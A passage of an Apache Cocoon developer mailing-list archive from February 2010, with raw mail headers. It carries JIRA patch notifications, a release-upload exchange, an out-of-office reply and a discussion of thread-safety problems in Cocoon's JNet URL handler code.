scheme://user:pass@host:port/path URIs https://issues.apache.org/jira/browse/COCOON-1249 COCOON-1232 [PATCH] NEW--ModuleDB Action for ORACLE( auto. increment ) https://issues.apache.org/jira/browse/COCOON-1232 COCOON-1203 [PATCH] inserver junit testing https://issues.apache.org/jira/browse/COCOON-1203 COCOON-1200 [PATCH] XML CSS engine https://issues.apache.org/jira/browse/COCOON-1200 COCOON-1185 [PATCH] BerkeleyDBStore https://issues.apache.org/jira/browse/COCOON-1185 COCOON-1147 [PATCH] namespace issues with XMLDBTransformer https://issues.apache.org/jira/browse/COCOON-1147 COCOON-1125 [PATCH] Updated CastorTransformer + samples https://issues.apache.org/jira/browse/COCOON-1125 COCOON-1027 [PATCH] CocoonBean add additional features for reprocessing pipelines and interrupt processing https://issues.apache.org/jira/browse/COCOON-1027 COCOON-996 [PATCH] LuceneIndexContentHandler.java produces CLOBs https://issues.apache.org/jira/browse/COCOON-996 COCOON-988 [PATCH] StreamGenerator can't handle multipart request parameters correctly https://issues.apache.org/jira/browse/COCOON-988 COCOON-881 [PATCH] file upload component for usage with flowscript https://issues.apache.org/jira/browse/COCOON-881 COCOON-871 [PATCH] XML posting from SourceWritingTransformer by using an enhanced HTTPClientSource https://issues.apache.org/jira/browse/COCOON-871 COCOON-867 [PATCH] wsinclude and htmlinclude transformers https://issues.apache.org/jira/browse/COCOON-867 COCOON-865 [PATCH] New ResourceLoadAction https://issues.apache.org/jira/browse/COCOON-865 COCOON-844 [PATCH] adding <wd:on-phase> and moving load() and save() to Form. https://issues.apache.org/jira/browse/COCOON-844 COCOON-825 [PATCH] Fix Bug: Better handling of CLOB in esql (get-xml) and handling of Oracle 'temporary lobs' https://issues.apache.org/jira/browse/COCOON-825 COCOON-719 [PATCH] Support for transactions in SQLTransformer https://issues.apache.org/jira/browse/COCOON-719 COCOON-717 [PATCH] Namespace cleanup in HTMLSerializer https://issues.apache.org/jira/browse/COCOON-717 COCOON-665 [PATCH] HSSFSerializer Support for FreezePane https://issues.apache.org/jira/browse/COCOON-665 You may edit this subscription at: https://issues.apache.org/jira/secure/FilterSubscription!default.jspa?subId=10311&filterId=12310771 From [email protected] Thu Feb 04 09:28:51 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 6620 invoked from network); 4 Feb 2010 09:28:50 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Feb 2010 09:28:50 -0000 Received: (qmail 47148 invoked by uid 500); 4 Feb 2010 09:28:50 -0000 Delivered-To: [email protected] Received: (qmail 47055 invoked by uid 500); 4 Feb 2010 09:28:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 47044 invoked by uid 99); 4 Feb 2010 09:28:48 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 04 Feb 2010 09:28:48 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 04 Feb 2010 09:28:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 06E0929A0012 for <[email protected]>; Thu, 4 Feb 2010 01:28:28 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 4 Feb 2010 09:28:28 +0000 (UTC) From: "Nico Verwer (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Created: (COCOON-2278) Make SOAPHelper use https, not just http MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 Make SOAPHelper use https, not just http ---------------------------------------- Key: COCOON-2278 URL: https://issues.apache.org/jira/browse/COCOON-2278 Project: Cocoon Issue Type: Improvement Components: Blocks: XSP Affects Versions: 2.1.11 Reporter: Nico Verwer The current SOAPHelper class in the XSP block only speaks http to webservices. With a small addition, it respects the protocol specified by, e.g., a WSDL file. Many webservices use https, which works with this patch for the SOAPHelper. Other protocols work if there is a protocol factory configured. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Feb 04 09:30:50 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 8062 invoked from network); 4 Feb 2010 09:30:49 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Feb 2010 09:30:49 -0000 Received: (qmail 49037 invoked by uid 500); 4 Feb 2010 09:30:49 -0000 Delivered-To: [email protected] Received: (qmail 48936 invoked by uid 500); 4 Feb 2010 09:30:49 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 48925 invoked by uid 99); 4 Feb 2010 09:30:48 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 04 Feb 2010 09:30:48 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 04 Feb 2010 09:30:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id E8ABF234C48D for <[email protected]>; Thu, 4 Feb 2010 01:30:27 -0800 (PST) Message-ID: <[email protected]> Date: Thu, 4 Feb 2010 09:30:27 +0000 (UTC) From: "Nico Verwer (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Updated: (COCOON-2278) Make SOAPHelper use https, not just http In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 [ https://issues.apache.org/jira/browse/COCOON-2278?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Nico Verwer updated COCOON-2278: -------------------------------- Attachment: SOAPHelper.patch This patch changes the org.apache.cocoon.components.language.markup.xspSOAPHelper so that it uses the protocol specified in the URL of the webservice. > Make SOAPHelper use https, not just http > ---------------------------------------- > > Key: COCOON-2278 > URL: https://issues.apache.org/jira/browse/COCOON-2278 > Project: Cocoon > Issue Type: Improvement > Components: Blocks: XSP > Affects Versions: 2.1.11 > Reporter: Nico Verwer > Attachments: SOAPHelper.patch > > > The current SOAPHelper class in the XSP block only speaks http to webservices. With a small addition, it respects the protocol specified by, e.g., a WSDL file. Many webservices use https, which works with this patch for the SOAPHelper. Other protocols work if there is a protocol factory configured. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Thu Feb 04 15:03:27 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 51538 invoked from network); 4 Feb 2010 15:03:27 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Feb 2010 15:03:27 -0000 Received: (qmail 58593 invoked by uid 500); 4 Feb 2010 15:03:26 -0000 Delivered-To: [email protected] Received: (qmail 58511 invoked by uid 500); 4 Feb 2010 15:03:26 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 58503 invoked by uid 99); 4 Feb 2010 15:03:26 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 04 Feb 2010 15:03:26 +0000 X-ASF-Spam-Status: No, hits=-0.0 required=10.0 tests=SPF_PASS X-Spam-Check-By: apache.org Received-SPF: pass (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO miraculix.workflow.at) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 04 Feb 2010 15:03:19 +0000 Subject: Gabriel Gruber/Workflow is out of office. Auto-Submitted: auto-generated From: Gabriel Gruber <[email protected]> To: [email protected] Message-ID: <[email protected]> Date: Thu, 4 Feb 2010 16:02:55 +0100 X-MIMETrack: Serialize by Router on Miraculix/Workflow(Release 8.5|December 05, 2008) at 04.02.2010 16:03:18 MIME-Version: 1.0 Content-type: text/plain; charset=ISO-8859-1 Content-transfer-encoding: quoted-printable I will be out of the office starting 04.02.2010 and will not return un= til 09.02.2010. Ich bin bis zum 08.02.2010 auf Urlaub und ab 09.02.2010 wieder f=FCr Si= e erreichbar. Bei technischen Fragen zum System Webdesk wenden Sie sich b= itte vertrauensvoll an Hrn. Gutzelnig oder Hrn. Stastny. Bei Fragen zu laufe= nden Projekten wenden Sie sich bitte an Hrn. Gutzelnig! In dringenden F=E4ll= en versuchen Sie es auf meinem Handy: 724-935-3143! mit freundlichen Gr=FCssen Gabriel Gruber= From [email protected] Fri Feb 05 02:52:58 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 22272 invoked from network); 5 Feb 2010 02:52:58 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Feb 2010 02:52:58 -0000 Received: (qmail 15743 invoked by uid 500); 5 Feb 2010 02:52:58 -0000 Delivered-To: [email protected] Received: (qmail 15598 invoked by uid 500); 5 Feb 2010 02:52:57 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 15590 invoked by uid 99); 5 Feb 2010 02:52:57 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Feb 2010 02:52:57 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO eastrmmtao106.cox.net) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Feb 2010 02:52:48 +0000 Received: from eastrmimpo03.cox.net ([161.129.204.104]) by eastrmmtao106.cox.net (InterMail vM.161.129.204.104 201-2244-105-20090324) with ESMTP id <[email protected]> for <[email protected]>; Thu, 4 Feb 2010 21:52:26 -0500 Received: from [161.129.204.104] ([161.129.204.104]) by eastrmimpo03.cox.net with bizsmtp id e2sS1d0050zjV5C022sS4m; Thu, 04 Feb 2010 21:52:26 -0500 X-VR-Score: -80.00 X-Authority-Analysis: v=1.1 cv=RjTCKG3kPVHzT+t7xAAYS8bCjcYRzac2JMP5J0xyIww= c=1 sm=1 a=0Svh7v3cjwcA:10 a=lYi7cwiOz1KJCuq9QYjeXw==:17 a=mV9VRH-2AAAA:8 a=3Xa2FOHDCVIaq_07TyoA:9 a=UhOFqwoZDLHx7Cw0n9-JMncGBTMA:4 a=lYi7cwiOz1KJCuq9QYjeXw==:117 X-CM-Score: 0.00 Content-Type: text/plain; charset=us-ascii Mime-Version: 1.0 (Apple Message framework v1077) Subject: Re: [VOTE RESULT] Release cocoon-xml 2.0.2 From: Vadim Gritsenko <[email protected]> In-Reply-To: <[email protected]> Date: Thu, 4 Feb 2010 21:52:26 -0500 Content-Transfer-Encoding: quoted-printable Message-Id: <[email protected]> References: <[email protected]> <[email protected]> <[email protected]> To: [email protected] X-Mailer: Apple Mail (2.1077) On Dec 22, 2009, at 2:09 AM, Carsten Ziegeler wrote: > Thanks for voting! I'll upload the artifacts asap. Hey Carsten, Were you able to upload it? All I could find is cocoon-xml-2.0.0 (and = with -source jars for some reason in the BINARIES directory - weird): http://www.apache.org/dist/cocoon/BINARIES/ Vadim= From [email protected] Fri Feb 05 07:17:34 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 97559 invoked from network); 5 Feb 2010 07:17:33 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Feb 2010 07:17:33 -0000 Received: (qmail 69302 invoked by uid 500); 5 Feb 2010 07:17:33 -0000 Delivered-To: [email protected] Received: (qmail 69180 invoked by uid 500); 5 Feb 2010 07:17:32 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 69172 invoked by uid 99); 5 Feb 2010 07:17:32 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Feb 2010 07:17:32 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 05 Feb 2010 07:17:23 +0000 Received: (qmail 97316 invoked by uid 99); 5 Feb 2010 07:17:01 -0000 Received: from localhost.apache.org (HELO Scrat.local) (161.129.204.104) (smtp-auth username cziegeler, mechanism plain) by minotaur.apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Feb 2010 07:17:01 +0000 Message-ID: <[email protected]> Date: Fri, 05 Feb 2010 08:16:59 +0100 From: Carsten Ziegeler <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; de; rv:161.129.204.104) Gecko/20090812 Lightning/0.9 Thunderbird/161.129.204.104 Mnenhy/161.129.204.1046 MIME-Version: 1.0 To: [email protected] Subject: Re: [VOTE RESULT] Release cocoon-xml 2.0.2 References: <[email protected]> <[email protected]> <[email protected]> <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 7bit X-Virus-Checked: Checked by ClamAV on apache.org Vadim Gritsenko wrote: > On Dec 22, 2009, at 2:09 AM, Carsten Ziegeler wrote: > >> Thanks for voting! I'll upload the artifacts asap. > > Hey Carsten, > > Were you able to upload it? All I could find is cocoon-xml-2.0.0 (and with -source jars for some reason in the BINARIES directory - weird): > > http://www.apache.org/dist/cocoon/BINARIES/ > Ups, yes I was able to upload it to the maven repo: http://repo2.maven.org/maven2/org/apache/cocoon/cocoon-xml/2.0.2/ but apparently forgot to put it into the dist folder as well.... Will do that asap Carsten -- Carsten Ziegeler [email protected] From [email protected] Fri Feb 05 10:11:42 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 49058 invoked from network); 5 Feb 2010 10:11:42 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Feb 2010 10:11:42 -0000 Received: (qmail 78359 invoked by uid 500); 5 Feb 2010 10:11:42 -0000 Delivered-To: [email protected] Received: (qmail 78236 invoked by uid 500); 5 Feb 2010 10:11:41 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 78227 invoked by uid 99); 5 Feb 2010 10:11:41 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Feb 2010 10:11:41 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (athena.apache.org: local policy) Received: from [161.129.204.104] (HELO indoqa.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Feb 2010 10:11:31 +0000 Received: from [161.129.204.104] (unknown [161.129.204.104]) by indoqa.com (Postfix) with ESMTP id 4A3A81A0003 for <[email protected]>; Fri, 5 Feb 2010 11:11:09 +0100 (CET) Message-ID: <[email protected]> Date: Fri, 05 Feb 2010 11:11:37 +0100 From: =?ISO-8859-1?Q?Reinhard_P=F6tz?= <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20090812) MIME-Version: 1.0 To: [email protected] Subject: [jnet] Threading issues X-Enigmail-Version: 0.96.0 Content-Type: multipart/mixed; boundary="------------050602070000080805060900" This is a multi-part message in MIME format. --------------050602070000080805060900 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Moving over this thread to dev. Carsten, any idea what could go wrong here? And, once I asked you why you used an InheritableThreadLocal instead of a ThreadLocal to store the list but can't remember. Can you explain it to me again? :-) -- Reinhard Pötz Managing Director, {Indoqa} GmbH http://www.indoqa.com/en/people/reinhard.poetz/ Member of the Apache Software Foundation Apache Cocoon Committer, PMC member [email protected] ________________________________________________________________________ --------------050602070000080805060900 Content-Type: message/rfc822; name="Re: HELP needed with latest Cocoon 2.2 (JNET / SSF).eml" Content-Transfer-Encoding: 8bit Content-Disposition: inline; filename*0="Re: HELP needed with latest Cocoon 2.2 (JNET / SSF).eml" X-Account-Key: account4 X-Mozilla-Keys: X-MSK: CML=0.001000 X-Apparently-To: [email protected] via 161.129.204.104; Thu, 04 Feb 2010 11:20:30 -0800 X-YMailISG: 1_f9yUoWLDtc2yoxo8IH4cuLxPNZYqzArYCkf62QIVh602zXANH7Lk2Go2dadf6T9rBSMV8c3kewB62rHUvwc2mOwaNmmJR0Flq5ni6N.xA5UVWaB58JGruemhhc7TOObDAtM6yvw8LFudjrTCW3WPVpMv9JV_0AINks7ZCY83j9_tY5YHOBEKDTSNLNWp3Gxb4LZQGrInJnfjWFfHH0Bw2BrSWAfWX0hNz9U93XXnkndTPE8EZIK8mLLEPEd01moY_PTZa1vlEe0MhY1xMlWllOREgykGRzS5v2gtP7IWnv6QsMMmE0Y8ASG_qKAjNFVa70vxjVLnI6tOZinApK5x8o_16O2ALf7DEiNtQL.eceoimme_64Wc.dF2s9qLUj0IoL_NR9vRN19tqE0v7rgChitaO9xYqKzeeNkpdktjWvmLa0GK3mhg1sMpkbUUYM0yojRXsTYg-- X-Originating-IP: [161.129.204.104] Authentication-Results: mta1024.mail.mud.yahoo.com from=apache.org; domainkeys=neutral (no sig) Received: from 161.129.204.104 (HELO minotaur.apache.org) (161.129.204.104) by mta1024.mail.mud.yahoo.com with SMTP; Thu, 04 Feb 2010 11:20:28 -0800 Received: (qmail 52770 invoked by uid 1692); 4 Feb 2010 19:20:25 -0000 Delivered-To: [email protected] Received: (qmail 52703 invoked from network); 4 Feb 2010 19:20:25 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 4 Feb 2010 19:20:25 -0000 Received: (qmail 76724 invoked by uid 500); 4 Feb 2010 19:20:24 -0000 Delivered-To: [email protected] Received: (qmail 76631 invoked by uid 500); 4 Feb 2010 19:20:24 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <users.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 76623 invoked by uid 99); 4 Feb 2010 19:20:24 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 04 Feb 2010 19:20:24 +0000 X-ASF-Spam-Status: No, hits=1.2 required=10.0 tests=SPF_NEUTRAL X-Spam-Check-By: apache.org Received-SPF: neutral (nike.apache.org: local policy) Received: from [161.129.204.104] (HELO indoqa.com) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Thu, 04 Feb 2010 19:20:13 +0000 Received: from [161.129.204.104] (unknown [161.129.204.104]) by indoqa.com (Postfix) with ESMTP id 66F7D257B81 for <[email protected]>; Thu, 4 Feb 2010 20:19:53 +0100 (CET) Message-ID: <[email protected]> Date: Thu, 04 Feb 2010 20:20:18 +0100 From: =?ISO-8859-1?Q?Reinhard_P=F6tz?= <[email protected]> User-Agent: Thunderbird 161.129.204.104 (Windows/20090812) MIME-Version: 1.0 To: [email protected] Subject: Re: HELP needed with latest Cocoon 2.2 (JNET / SSF) References: <[email protected]> <[email protected]> In-Reply-To: <[email protected]> X-Enigmail-Version: 0.96.0 Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit X-Virus-Checked: Checked by ClamAV on apache.org Reinhard Pötz wrote: > Gabriel Gruber wrote: >> Hi Joe, >> >> well, I don't have a replayable scenario yet (f.i. testcase), but it >> seems that the exception comes after heavy use of cocoon pages within >> our application. >> I suspect that cocoon:/ protocol usage AND/OR inheritence of sitemap >> calling (we "extend" cocoon-forms block to override specific resources) >> might be the root of problem. But that is only a guess... >> >> We are using latest trunk versions of servlet-service-framework and jnet >> subprojects. I know that Grek made some changes in cocoon servlet >> service framework in summer 2009, which went into the 1.2 release, which >> we are using (since then no changes have been comitted). >> >> The problems reported here (exact same problem we have) >> >> http://jira.dspace.org/jira/browse/DS-253?page=com.atlassian.jira.plugin.system.issuetabpanels%3Acomment-tabpanel > > I had a look at the JNet code and haven't found a cause for your > problems. The list of URLStreamHandlerFactory objects is stored in a > thread local. > > I propose that you add extensive logging to > org.apache.cocoon.jnet.URLHandlerFactoryCollector, > org.apache.cocoon.jnet.DynamicURLStreamHandlerFactory and > org.apache.cocoon.jnet.URLStreamHandlerFactoryInstaller > > Then create a special logging target for all org.apache.cocoon.jnet > messages and make sure that you also log the tread ids. > > Then try to reproduce your problems and you should get a hint from the > logs what could be the cause of empty lists. > > Maybe you can also provide a patch with the logging statements. It might also be interesting to see, whether the exceptions changes (or disappears) if you change line 42 of o.a.c.jnet.DynamicURLStreamHandlerFactory to list = Collections.synchronizedList(new LinkedList<URLStreamHandlerFactory>()); Steven and I experimented with linked lists today and didn't find a way to produce a NPE as long as only a single thread accesses it. Those exceptions only occur in the case of multiple threads modifying it without synchronization. So I expect that this change will just lead to an IndexOutOfBoundException ... -- Reinhard Pötz Managing Director, {Indoqa} GmbH http://www.indoqa.com/en/people/reinhard.poetz/ Member of the Apache Software Foundation Apache Cocoon Committer, PMC member [email protected] ________________________________________________________________________ --------------------------------------------------------------------- To unsubscribe, e-mail: [email protected] For additional commands, e-mail: [email protected] --------------050602070000080805060900-- From [email protected] Fri Feb 05 16:36:12 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 90332 invoked from network); 5 Feb 2010 16:36:11 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 5 Feb 2010 16:36:11 -0000 Received: (qmail 4820 invoked by uid 500); 5 Feb 2010 16:36:11 -0000 Delivered-To: [email protected] Received: (qmail 4720 invoked by uid 500); 5 Feb 2010 16:36:10 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 4712 invoked by uid 99); 5 Feb 2010 16:36:10 -0000 Received: from athena.apache.org (HELO athena.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Feb 2010 16:36:10 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO minotaur.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with SMTP; Fri, 05 Feb 2010 16:36:09 +0000 Received: (qmail 90200 invoked by uid 99); 5 Feb 2010 16:35:49 -0000 Received: from localhost.apache.org (HELO Scrat.local) (161.129.204.104) (smtp-auth username cziegeler, mechanism plain) by minotaur.apache.org (qpsmtpd/0.29) with ESMTP; Fri, 05 Feb 2010 16:35:49 +0000 Message-ID: <[email protected]> Date: Fri, 05 Feb 2010 17:35:47 +0100 From: Carsten Ziegeler <[email protected]> User-Agent: Mozilla/5.0 (Macintosh; U; Intel Mac OS X; de; rv:161.129.204.104) Gecko/20090812 Lightning/0.9 Thunderbird/161.129.204.104 Mnenhy/161.129.204.1046 MIME-Version: 1.0 To: [email protected] Subject: Re: [jnet] Threading issues References: <[email protected]> In-Reply-To: <[email protected]> Content-Type: text/plain; charset=ISO-8859-1 Content-Transfer-Encoding: 8bit Reinhard Pötz wrote: > Moving over this thread to dev. > > Carsten, any idea what could go wrong here? And, once I asked you why > you used an InheritableThreadLocal instead of a ThreadLocal to store the > list but can't remember. Can you explain it to me again? :-) > I fear I can't help that much - the code has changed from my original version which did not use a list :) To be honest I don't know anymore why an InheritableThreadLocal was the better choice....now I guess because if you start a thread within the current execution, than this thread gets the same url handlers. With a simple ThreadLocal you don't get this. While having the same url handlers in the new thread is nice, it might create problems if the original thread executes before the newly started. But nevertheless this shouldn't result in concurrency problems as far as I can see. Carsten -- Carsten Ziegeler [email protected] From [email protected] Mon Feb 08 19:55:53 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 13363 invoked from network); 8 Feb 2010 19:55:53 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Feb 2010 19:55:53 -0000 Received: (qmail 32432 invoked by uid 500); 8 Feb 2010 19:55:52 -0000 Delivered-To: [email protected] Received: (qmail 32339 invoked by uid 500); 8 Feb 2010 19:55:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 32008 invoked by uid 99); 8 Feb 2010 19:55:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Feb 2010 19:55:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Feb 2010 19:55:48 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by brutus.apache.org (Postfix) with ESMTP id 00D9C29A0011 for <[email protected]>; Mon, 8 Feb 2010 11:55:28 -0800 (PST) Message-ID: <[email protected]> Date: Mon, 8 Feb 2010 19:55:28 +0000 (UTC) From: "Simone Tripodi (JIRA)" <[email protected]> To: [email protected] Subject: [jira] Closed: (COCOON3-51) XIncludeTransformer sends extra startDocument and endDocument events In-Reply-To: <[email protected]> MIME-Version: 1.0 Content-Type: text/plain; charset=utf-8 Content-Transfer-Encoding: 7bit X-JIRA-FingerPrint: 30527f35849b9dde25b450d4833f0394 X-Virus-Checked: Checked by ClamAV on apache.org [ https://issues.apache.org/jira/browse/COCOON3-51?page=com.atlassian.jira.plugin.system.issuetabpanels:all-tabpanel ] Simone Tripodi closed COCOON3-51. --------------------------------- Resolution: Fixed Fix Version/s: 3.0.0-alpha-3 Patch applied successfully. I investigated a lot about it before applying it and I combined the two patches provided, there's no better way than using the 'documentLevel' variable - see first submitted patch - and tested with test provided in the second patch. Thanks Charles :) > XIncludeTransformer sends extra startDocument and endDocument events > -------------------------------------------------------------------- > > Key: COCOON3-51 > URL: https://issues.apache.org/jira/browse/COCOON3-51 > Project: Cocoon 3 > Issue Type: Bug > Components: cocoon-sax > Affects Versions: 3.0.0-alpha-3 > Reporter: Charles Yates > Assignee: Simone Tripodi > Fix For: 3.0.0-alpha-3 > > Attachments: COCOON3-51.txt, patch.txt > > > The XIncludeTransformer sends extra start and endDocument events causing errors in subsequent handlers. -- This message is automatically generated by JIRA. - You can reply to this email to add a comment to the issue online. From [email protected] Mon Feb 08 20:27:52 2010 Return-Path: <[email protected]> Delivered-To: [email protected] Received: (qmail 20789 invoked from network); 8 Feb 2010 20:27:52 -0000 Received: from hermes.apache.org (HELO mail.apache.org) (161.129.204.104) by minotaur.apache.org with SMTP; 8 Feb 2010 20:27:52 -0000 Received: (qmail 67900 invoked by uid 500); 8 Feb 2010 20:27:51 -0000 Delivered-To: [email protected] Received: (qmail 67801 invoked by uid 500); 8 Feb 2010 20:27:51 -0000 Mailing-List: contact [email protected]; run by ezmlm Precedence: bulk list-help: <mailto:[email protected]> list-unsubscribe: <mailto:[email protected]> List-Post: <mailto:[email protected]> Reply-To: [email protected] List-Id: <dev.cocoon.apache.org> Delivered-To: mailing list [email protected] Received: (qmail 67793 invoked by uid 99); 8 Feb 2010 20:27:51 -0000 Received: from nike.apache.org (HELO nike.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Feb 2010 20:27:51 +0000 X-ASF-Spam-Status: No, hits=-2000.0 required=10.0 tests=ALL_TRUSTED X-Spam-Check-By: apache.org Received: from [161.129.204.104] (HELO brutus.apache.org) (161.129.204.104) by apache.org (qpsmtpd/0.29) with ESMTP; Mon, 08 Feb 2010 20:27:49 +0000 Received: from brutus.apache.org (localhost [161.129.204.104]) by 